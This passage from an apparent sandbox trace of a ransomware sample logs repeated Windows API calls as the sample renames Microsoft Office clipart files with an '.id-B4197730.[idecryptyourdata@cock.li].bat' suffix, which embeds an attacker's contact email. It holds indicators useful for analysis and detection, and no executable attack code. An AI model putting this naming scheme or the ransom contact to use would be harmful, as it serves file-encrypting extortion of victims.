dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.792] CloseHandle (hObject=0x514) returned 1 [0164.793] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.793] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.793] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199279.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199279.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.794] CloseHandle (hObject=0x514) returned 1 [0164.795] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.795] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.795] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199303.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199303.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.795] CloseHandle (hObject=0x514) returned 1 [0164.796] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.797] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.797] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199307.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199307.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.797] CloseHandle (hObject=0x514) returned 1 [0164.798] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.798] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.798] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199423.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199423.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.798] CloseHandle (hObject=0x514) returned 1 [0164.799] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.799] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.799] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199429.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199429.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.799] CloseHandle (hObject=0x514) returned 1 [0164.800] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.800] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.800] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199465.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199465.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.800] CloseHandle (hObject=0x514) returned 1 [0164.801] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.802] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.802] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199469.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199469.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.802] CloseHandle (hObject=0x514) returned 1 [0164.803] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.803] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.803] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199473.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199473.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.803] CloseHandle (hObject=0x514) returned 1 [0164.805] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.805] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.805] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199475.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199475.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.805] CloseHandle (hObject=0x514) returned 1 [0164.806] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.806] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.806] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199483.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199483.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.807] CloseHandle (hObject=0x514) returned 1 [0164.810] GetFileSizeEx (in: hFile=0x514, lpFileSize=0x363ff14 | out: lpFileSize=0x363ff14*=12332) returned 1 [0164.810] CloseHandle (hObject=0x514) returned 1 [0164.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf")) returned 0x220 [0164.810] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0164.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x514 [0164.812] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.812] SetFilePointerEx (in: hFile=0x514, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0164.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0199609.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0199609.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0164.812] CloseHandle (hObject=0x514) returned 1 [0165.771] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.771] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.771] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0200151.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0200151.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.979] CloseHandle (hObject=0x528) returned 1 [0165.980] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.980] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285820.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285820.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.980] CloseHandle (hObject=0x528) returned 1 [0165.981] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.981] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0285822.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0285822.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.982] CloseHandle (hObject=0x528) returned 1 [0165.983] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.983] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287018.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287018.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.984] CloseHandle (hObject=0x528) returned 1 [0165.985] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.985] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287019.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287019.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.985] CloseHandle (hObject=0x528) returned 1 [0165.986] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.986] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287020.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287020.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.986] CloseHandle (hObject=0x528) returned 1 [0165.987] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.987] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287024.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287024.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.988] CloseHandle (hObject=0x528) returned 1 [0165.989] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.989] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287408.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287408.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.989] CloseHandle (hObject=0x528) returned 1 [0165.990] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.991] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287415.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287415.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.991] CloseHandle (hObject=0x528) returned 1 [0165.991] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.991] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.991] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287417.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287417.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.992] CloseHandle (hObject=0x528) returned 1 [0165.992] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.992] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287641.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287641.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.992] CloseHandle (hObject=0x528) returned 1 [0165.994] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.994] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.994] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287642.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287642.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.994] CloseHandle (hObject=0x528) returned 1 [0165.995] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.995] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.995] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287643.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287643.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.996] CloseHandle (hObject=0x528) returned 1 [0165.997] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.997] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287644.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287644.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.997] CloseHandle (hObject=0x528) returned 1 [0165.999] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.999] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0165.999] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0287645.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0287645.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0165.999] CloseHandle (hObject=0x528) returned 1 [0166.001] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.001] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0289430.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0289430.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.001] CloseHandle (hObject=0x528) returned 1 [0166.002] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.002] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.002] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0290548.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0290548.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.002] CloseHandle (hObject=0x528) returned 1 [0166.004] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.004] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.004] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0291794.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0291794.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.004] CloseHandle (hObject=0x528) returned 1 [0166.005] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.005] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292248.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292248.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0166.006] CloseHandle (hObject=0x528) returned 1 [0166.007] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.007] SetFilePointerEx (in: hFile=0x528, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x363fec0 | out: lpNewFilePointer=0x0) returned 1 [0166.007] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0292270.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0292270.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, 